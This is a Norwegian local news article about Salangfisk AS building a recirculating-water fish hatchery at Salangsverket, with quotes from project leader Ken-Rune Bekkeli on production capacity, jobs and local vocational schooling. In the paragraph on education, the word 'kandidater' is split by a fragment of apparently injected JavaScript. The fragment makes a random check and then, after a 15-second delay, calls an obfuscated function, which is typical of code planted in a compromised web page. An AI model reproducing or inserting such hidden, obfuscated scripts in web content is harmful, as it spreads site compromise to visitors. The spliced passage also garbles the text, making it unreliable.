Verdens mest moderne settefiskanlegg

Prosjektleder Ken-Rune Bekkeli. Foto: Per Asbjørn Gundersen

For tiden er det stor aktivitet rundt Salangsverket i forbindelse med bygging av et settefiskanlegg til  Salangfisk AS. Utbyggingen startet i sluttet av 2015 og det har kommet synlige endringer på tomta.

I 2018 skal settefiskanlegget ferdigstilles, og det blir 9 000 kvadratmeter som vil inneholde et topp moderne RAS-system (resirkulering av vann). Det nye anlegget vil ha en produksjonskapasitet på seks millioner smolt i året med en snittvekt på 250 gram. Tradisjonelt er produksjonstiden i sjø på 15-18 måneder, men med det nye anlegget vil de redusere produksjonstiden i sjø med 6-8 måneder, det gjør at utnyttelsesgraden av sjøareal blir mer effektiv. Færre produksjonsdager i sjø fører også til redusert risiko for at fisken blir eksponert for lus eller annen smitte. Dette anlegget er beregnet å ha ca. 14 ansatte, men når den står ferdig vil det få en følgeeffekt som vil generere mer en det dobbelte i tilstøtende aktiviteter i regionen. For eksempel vil økt produksjon føre til at det er mer kilo fisk som må fraktes på brønnbåtene og det får positiv effekt på de lokalitetene som er i sjøen. I tillegg vil det også få en aktivitetseffekt på slakterisiden. Det vil også føre til økt aktivitet i Narvik i og med at den er med å skape grunnlag for togtransport, forklarer prosjektleder Ken-Rune Bekkeli.

Anlegget er planlagt å være ferdigstilt mellom årsskiftet 2017/2018, men anlegget skal deldriftsettes allerede i april 2017.  Forklaringen på at anlegget er plassert på Salangsverket kan Bekkeli forklare. Salangfisk AS har vært etablert i Salangen siden 1979. I tillegg tar det lang tid å etablere vannrettigheter og siden vi allerede hadde det her falt det naturlig at vi benyttet oss av den, forklarer han og legger til at hjertet til bedriften er i Salangen.

 

Videoreportasje: Per Asbjørn Gundersen.

 

Bekkeli sier at det ikke er mangel på utdanningsmuligheter innenfor havbruksnæringa i Midt-Troms. Bare noen kilometer unna det nye anlegget ligger Sjøvegan videregående skole som har fått etablert en ny yrkesfaglig studieretning som heter «Kjemi og prosessteknikk med fordypning settefisk». Nylig hadde vi et spennende møte med elevene, flere av dem var tydelige på at de ønsker å jobbe innenfor oppdrettsnæringen. De mulighetene som ligger i den linja er spennende, sier Bekkeli. Elevene ved kjemi og prosessteknikk skal være i jobb to dager i uken og på skolen i tre dager, og da er det bra at elevene har Salangfisk AS rett rundt hjørnet. Utdanning innen biologisk produksjon har Senja videregående skole ansvar for. Vi håper at kandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andidater med god kompetanse og godt humør finner veien til oss, fortsetter Bekkeli.

Utviklinga fremover er ikke lett å forutse, men Bekkeli forklarer at produksjonskapasiteten  som bygges opp nå er tilstrekkelig for en periode fremover. Vi, på lik linje med resten av næringa, skal og vil være med på den veksten som forventes.  Vi skal først få anlegget opp å gå og være trygg på det produktet som skal lages.